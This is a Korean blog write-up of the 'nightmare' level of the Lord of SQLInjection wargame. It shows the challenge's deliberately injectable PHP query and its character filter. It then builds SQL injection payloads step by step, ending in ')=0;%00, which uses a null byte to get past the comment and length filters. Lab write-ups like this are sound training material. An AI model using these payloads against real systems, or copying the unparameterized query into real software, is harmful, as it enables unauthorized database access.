nightmare

wargame 🏴‍☠️ write-up/Lord of SQLInjection

nightmare

Kortsec1 2023. 8. 3. 22:31

1. Code

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])>6) exit("No Hack ~_~"); 
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("nightmare"); 
  highlight_file(__FILE__); 
?>

2. Condition

prob _ . () # - 를 필터링 한다.
strlen 함수를 통해 GET 파라미터 pw의 길이를 6이하로 제한한다.

3. Solution

우선 제한이 없다고 가정하고, 차근차근 필요한 부분을 작성해 보자.

select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'

변수명	값
pw	') or 1=1#

다음으로 필터링을 우회해 보자.

위 쿼리에서는 #이 필터링에 걸리게 된다.

#과 -모두 필터링 되어, ;%00을 이용하여 우회해 주었다.

변수명	값
pw	') or 1=1;%00

두번째로 길이를 맞춰볼 것이다.

현재 쿼리의 길이는 11이다. or 치환만으로는 6이하를 만족시킬 수 없다.

논리값을 바꿔주어 간신히 길이 6을 맞출 수 있었다.

변수명	값
pw	')=0;%00

위 값을 최종적으로 입력해주면 문제가 해결된다.

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

dragon (0)	2023.08.03
xavis (0)	2023.08.03
zombie_assasin (0)	2023.08.03
succubus (0)	2023.08.01

현재글nightmare

관계자외 출입 금지

cl.cl, SSTI, CVE-2024-23897, 대상 파일, 실행 파일 형식, RCE, ir code, Vulnerability, 취약점, 중간 코드, h4cking game, 구문 분석, jenkins, PortSwigger, 어휘 분석, 2023 Top 10, PowerShell, web, James Kettle, expandAtFiles,

Today :
Yesterday :

일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

보안

nightmare

1. Code

2. Condition

3. Solution

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

티스토리툴바

nightmare

1. Code

2. Condition

3. Solution

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

관련글

티스토리툴바